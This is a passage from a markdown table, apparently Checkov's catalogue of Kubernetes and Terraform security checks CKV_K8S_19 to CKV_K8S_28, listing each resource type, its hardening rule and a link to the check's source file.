Terraform | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespace.py) | +| 2666 | CKV_K8S_19 | resource | kubernetes_pod_v1 | Do not admit containers wishing to share the host network namespace | Terraform | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespace.py) | +| 2667 | CKV_K8S_20 | resource | CronJob | Containers should not run with allowPrivilegeEscalation | Kubernetes | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py) | +| 2668 | CKV_K8S_20 | resource | DaemonSet | Containers should not run with allowPrivilegeEscalation | Kubernetes | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py) | +| 2669 | CKV_K8S_20 | resource | Deployment | Containers should not run with allowPrivilegeEscalation | Kubernetes | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py) | +| 2670 | CKV_K8S_20 | resource | DeploymentConfig | Containers should not run with allowPrivilegeEscalation | Kubernetes | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py) | +| 2671 | CKV_K8S_20 | resource | Job | Containers should not run with allowPrivilegeEscalation | Kubernetes | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py) | +| 2672 | CKV_K8S_20 | resource | Pod | Containers should not run with allowPrivilegeEscalation | Kubernetes | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py) | +| 2673 | CKV_K8S_20 | resource | PodTemplate | Containers should not run with allowPrivilegeEscalation | Kubernetes | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py) | +| 2674 | CKV_K8S_20 | resource | ReplicaSet | Containers should not run with allowPrivilegeEscalation | Kubernetes | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py) | +| 2675 | CKV_K8S_20 | resource | ReplicationController | Containers should not run with allowPrivilegeEscalation | Kubernetes | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py) | +| 2676 | CKV_K8S_20 | resource | StatefulSet | Containers should not run with allowPrivilegeEscalation | Kubernetes | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py) | +| 2677 | CKV_K8S_20 | resource | kubernetes_deployment | Containers should not run with allowPrivilegeEscalation | Terraform | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowPrivilegeEscalation.py) | +| 2678 | CKV_K8S_20 | resource | kubernetes_deployment_v1 | Containers should not run with allowPrivilegeEscalation | Terraform | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowPrivilegeEscalation.py) | +| 2679 | CKV_K8S_20 | resource | kubernetes_pod | Containers should not run with allowPrivilegeEscalation | Terraform | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowPrivilegeEscalation.py) | +| 2680 | CKV_K8S_20 | resource | kubernetes_pod_v1 | Containers should not run with allowPrivilegeEscalation | Terraform | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowPrivilegeEscalation.py) | +| 2681 | CKV_K8S_21 | resource | ConfigMap | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | +| 2682 | CKV_K8S_21 | resource | CronJob | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | +| 2683 | CKV_K8S_21 | resource | DaemonSet | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | +| 2684 | CKV_K8S_21 | resource | Deployment | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | +| 2685 | CKV_K8S_21 | resource | Ingress | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | +| 2686 | CKV_K8S_21 | resource | Job | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | +| 2687 | CKV_K8S_21 | resource | Pod | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | +| 2688 | CKV_K8S_21 | resource | ReplicaSet | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | +| 2689 | CKV_K8S_21 | resource | ReplicationController | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | +| 2690 | CKV_K8S_21 | resource | Role | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | +| 2691 | CKV_K8S_21 | resource | RoleBinding | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | +| 2692 | CKV_K8S_21 | resource | Secret | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | +| 2693 | CKV_K8S_21 | resource | Service | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | +| 2694 | CKV_K8S_21 | resource | ServiceAccount | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | +| 2695 | CKV_K8S_21 | resource | StatefulSet | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | +| 2696 | CKV_K8S_21 | resource | kubernetes_config_map | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 2697 | CKV_K8S_21 | resource | kubernetes_config_map_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 2698 | CKV_K8S_21 | resource | kubernetes_cron_job | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 2699 | CKV_K8S_21 | resource | kubernetes_cron_job_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 2700 | CKV_K8S_21 | resource | kubernetes_daemon_set_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 2701 | CKV_K8S_21 | resource | kubernetes_daemonset | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 2702 | CKV_K8S_21 | resource | kubernetes_deployment | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 2703 | CKV_K8S_21 | resource | kubernetes_deployment_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 2704 | CKV_K8S_21 | resource | kubernetes_ingress | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 2705 | CKV_K8S_21 | resource | kubernetes_ingress_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 2706 | CKV_K8S_21 | resource | kubernetes_job | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 2707 | CKV_K8S_21 | resource | kubernetes_job_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 2708 | CKV_K8S_21 | resource | kubernetes_pod | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 2709 | CKV_K8S_21 | resource | kubernetes_pod_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 2710 | CKV_K8S_21 | resource | kubernetes_replication_controller | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 2711 | CKV_K8S_21 | resource | kubernetes_replication_controller_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 2712 | CKV_K8S_21 | resource | kubernetes_role_binding | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 2713 | CKV_K8S_21 | resource | kubernetes_role_binding_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 2714 | CKV_K8S_21 | resource | kubernetes_secret | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 2715 | CKV_K8S_21 | resource | kubernetes_secret_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 2716 | CKV_K8S_21 | resource | kubernetes_service | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 2717 | CKV_K8S_21 | resource | kubernetes_service_account | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 2718 | CKV_K8S_21 | resource | kubernetes_service_account_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 2719 | CKV_K8S_21 | resource | kubernetes_service_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 2720 | CKV_K8S_21 | resource | kubernetes_stateful_set | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 2721 | CKV_K8S_21 | resource | kubernetes_stateful_set_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | +| 2722 | CKV_K8S_22 | resource | CronJob | Use read-only filesystem for containers where possible | Kubernetes | [ReadOnlyFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py) | +| 2723 | CKV_K8S_22 | resource | DaemonSet | Use read-only filesystem for containers where possible | Kubernetes | [ReadOnlyFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py) | +| 2724 | CKV_K8S_22 | resource | Deployment | Use read-only filesystem for containers where possible | Kubernetes | [ReadOnlyFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py) | +| 2725 | CKV_K8S_22 | resource | DeploymentConfig | Use read-only filesystem for containers where possible | Kubernetes | [ReadOnlyFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py) | +| 2726 | CKV_K8S_22 | resource | Job | Use read-only filesystem for containers where possible | Kubernetes | [ReadOnlyFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py) | +| 2727 | CKV_K8S_22 | resource | Pod | Use read-only filesystem for containers where possible | Kubernetes | [ReadOnlyFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py) | +| 2728 | CKV_K8S_22 | resource | PodTemplate | Use read-only filesystem for containers where possible | Kubernetes | [ReadOnlyFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py) | +| 2729 | CKV_K8S_22 | resource | ReplicaSet | Use read-only filesystem for containers where possible | Kubernetes | [ReadOnlyFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py) | +| 2730 | CKV_K8S_22 | resource | ReplicationController | Use read-only filesystem for containers where possible | Kubernetes | [ReadOnlyFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py) | +| 2731 | CKV_K8S_22 | resource | StatefulSet | Use read-only filesystem for containers where possible | Kubernetes | [ReadOnlyFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py) | +| 2732 | CKV_K8S_22 | resource | kubernetes_deployment | Use read-only filesystem for containers where possible | Terraform | [ReadonlyRootFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadonlyRootFilesystem.py) | +| 2733 | CKV_K8S_22 | resource | kubernetes_deployment_v1 | Use read-only filesystem for containers where possible | Terraform | [ReadonlyRootFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadonlyRootFilesystem.py) | +| 2734 | CKV_K8S_22 | resource | kubernetes_pod | Use read-only filesystem for containers where possible | Terraform | [ReadonlyRootFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadonlyRootFilesystem.py) | +| 2735 | CKV_K8S_22 | resource | kubernetes_pod_v1 | Use read-only filesystem for containers where possible | Terraform | [ReadonlyRootFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadonlyRootFilesystem.py) | +| 2736 | CKV_K8S_23 | resource | CronJob | Minimize the admission of root containers | Kubernetes | [RootContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainers.py) | +| 2737 | CKV_K8S_23 | resource | DaemonSet | Minimize the admission of root containers | Kubernetes | [RootContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainers.py) | +| 2738 | CKV_K8S_23 | resource | Deployment | Minimize the admission of root containers | Kubernetes | [RootContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainers.py) | +| 2739 | CKV_K8S_23 | resource | Job | Minimize the admission of root containers | Kubernetes | [RootContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainers.py) | +| 2740 | CKV_K8S_23 | resource | Pod | Minimize the admission of root containers | Kubernetes | [RootContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainers.py) | +| 2741 | CKV_K8S_23 | resource | ReplicaSet | Minimize the admission of root containers | Kubernetes | [RootContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainers.py) | +| 2742 | CKV_K8S_23 | resource | ReplicationController | Minimize the admission of root containers | Kubernetes | [RootContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainers.py) | +| 2743 | CKV_K8S_23 | resource | StatefulSet | Minimize the admission of root containers | Kubernetes | [RootContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainers.py) | +| 2744 | CKV_K8S_24 | resource | PodSecurityPolicy | Do not allow containers with added capability | Kubernetes | [AllowedCapabilitiesPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesPSP.py) | +| 2745 | CKV_K8S_24 | resource | kubernetes_pod_security_policy | Do not allow containers with added capability | Terraform | [AllowedCapabilitiesPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesPSP.py) | +| 2746 | CKV_K8S_25 | resource | CronJob | Minimize the admission of containers with added capability | Kubernetes | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilities.py) | +| 2747 | CKV_K8S_25 | resource | DaemonSet | Minimize the admission of containers with added capability | Kubernetes | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilities.py) | +| 2748 | CKV_K8S_25 | resource | Deployment | Minimize the admission of containers with added capability | Kubernetes | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilities.py) | +| 2749 | CKV_K8S_25 | resource | DeploymentConfig | Minimize the admission of containers with added capability | Kubernetes | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilities.py) | +| 2750 | CKV_K8S_25 | resource | Job | Minimize the admission of containers with added capability | Kubernetes | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilities.py) | +| 2751 | CKV_K8S_25 | resource | Pod | Minimize the admission of containers with added capability | Kubernetes | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilities.py) | +| 2752 | CKV_K8S_25 | resource | PodTemplate | Minimize the admission of containers with added capability | Kubernetes | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilities.py) | +| 2753 | CKV_K8S_25 | resource | ReplicaSet | Minimize the admission of containers with added capability | Kubernetes | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilities.py) | +| 2754 | CKV_K8S_25 | resource | ReplicationController | Minimize the admission of containers with added capability | Kubernetes | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilities.py) | +| 2755 | CKV_K8S_25 | resource | StatefulSet | Minimize the admission of containers with added capability | Kubernetes | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilities.py) | +| 2756 | CKV_K8S_25 | resource | kubernetes_deployment | Minimize the admission of containers with added capability | Terraform | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilities.py) | +| 2757 | CKV_K8S_25 | resource | kubernetes_deployment_v1 | Minimize the admission of containers with added capability | Terraform | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilities.py) | +| 2758 | CKV_K8S_25 | resource | kubernetes_pod | Minimize the admission of containers with added capability | Terraform | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilities.py) | +| 2759 | CKV_K8S_25 | resource | kubernetes_pod_v1 | Minimize the admission of containers with added capability | Terraform | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilities.py) | +| 2760 | CKV_K8S_26 | resource | CronJob | Do not specify hostPort unless absolutely necessary | Kubernetes | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/HostPort.py) | +| 2761 | CKV_K8S_26 | resource | DaemonSet | Do not specify hostPort unless absolutely necessary | Kubernetes | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/HostPort.py) | +| 2762 | CKV_K8S_26 | resource | Deployment | Do not specify hostPort unless absolutely necessary | Kubernetes | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/HostPort.py) | +| 2763 | CKV_K8S_26 | resource | DeploymentConfig | Do not specify hostPort unless absolutely necessary | Kubernetes | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/HostPort.py) | +| 2764 | CKV_K8S_26 | resource | Job | Do not specify hostPort unless absolutely necessary | Kubernetes | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/HostPort.py) | +| 2765 | CKV_K8S_26 | resource | Pod | Do not specify hostPort unless absolutely necessary | Kubernetes | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/HostPort.py) | +| 2766 | CKV_K8S_26 | resource | PodTemplate | Do not specify hostPort unless absolutely necessary | Kubernetes | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/HostPort.py) | +| 2767 | CKV_K8S_26 | resource | ReplicaSet | Do not specify hostPort unless absolutely necessary | Kubernetes | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/HostPort.py) | +| 2768 | CKV_K8S_26 | resource | ReplicationController | Do not specify hostPort unless absolutely necessary | Kubernetes | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/HostPort.py) | +| 2769 | CKV_K8S_26 | resource | StatefulSet | Do not specify hostPort unless absolutely necessary | Kubernetes | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/HostPort.py) | +| 2770 | CKV_K8S_26 | resource | kubernetes_deployment | Do not specify hostPort unless absolutely necessary | Terraform | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/HostPort.py) | +| 2771 | CKV_K8S_26 | resource | kubernetes_deployment_v1 | Do not specify hostPort unless absolutely necessary | Terraform | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/HostPort.py) | +| 2772 | CKV_K8S_26 | resource | kubernetes_pod | Do not specify hostPort unless absolutely necessary | Terraform | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/HostPort.py) | +| 2773 | CKV_K8S_26 | resource | kubernetes_pod_v1 | Do not specify hostPort unless absolutely necessary | Terraform | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/HostPort.py) | +| 2774 | CKV_K8S_27 | resource | CronJob | Do not expose the docker daemon socket to containers | Kubernetes | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DockerSocketVolume.py) | +| 2775 | CKV_K8S_27 | resource | DaemonSet | Do not expose the docker daemon socket to containers | Kubernetes | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DockerSocketVolume.py) | +| 2776 | CKV_K8S_27 | resource | Deployment | Do not expose the docker daemon socket to containers | Kubernetes | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DockerSocketVolume.py) | +| 2777 | CKV_K8S_27 | resource | Job | Do not expose the docker daemon socket to containers | Kubernetes | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DockerSocketVolume.py) | +| 2778 | CKV_K8S_27 | resource | Pod | Do not expose the docker daemon socket to containers | Kubernetes | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DockerSocketVolume.py) | +| 2779 | CKV_K8S_27 | resource | ReplicaSet | Do not expose the docker daemon socket to containers | Kubernetes | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DockerSocketVolume.py) | +| 2780 | CKV_K8S_27 | resource | ReplicationController | Do not expose the docker daemon socket to containers | Kubernetes | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DockerSocketVolume.py) | +| 2781 | CKV_K8S_27 | resource | StatefulSet | Do not expose the docker daemon socket to containers | Kubernetes | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DockerSocketVolume.py) | +| 2782 | CKV_K8S_27 | resource | kubernetes_daemon_set_v1 | Do not expose the docker daemon socket to containers | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py) | +| 2783 | CKV_K8S_27 | resource | kubernetes_daemonset | Do not expose the docker daemon socket to containers | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py) | +| 2784 | CKV_K8S_27 | resource | kubernetes_deployment | Do not expose the docker daemon socket to containers | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py) | +| 2785 | CKV_K8S_27 | resource | kubernetes_deployment_v1 | Do not expose the docker daemon socket to containers | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py) | +| 2786 | CKV_K8S_27 | resource | kubernetes_pod | Do not expose the docker daemon socket to containers | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py) | +| 2787 | CKV_K8S_27 | resource | kubernetes_pod_v1 | Do not expose the docker daemon socket to containers | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py) | +| 2788 | CKV_K8S_28 | resource | CronJob | Minimize the admission of containers with the NET_RAW capability | Kubernetes | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py) | +| 2789 | CKV_K8S_28 | resource | DaemonSet | Minimize the admission of containers with the NET_RAW capability | Kubernetes | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py) | +| 2790 | CKV_K8S_28 | resource | Deployment | Minimize the admission of containers with the NET_RAW capability | Kubernetes | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py) | +| 2791 | CKV_K8S_28 | resource | DeploymentConfig | Minimize the admission of containers with the NET_RAW capability | Kubernetes | 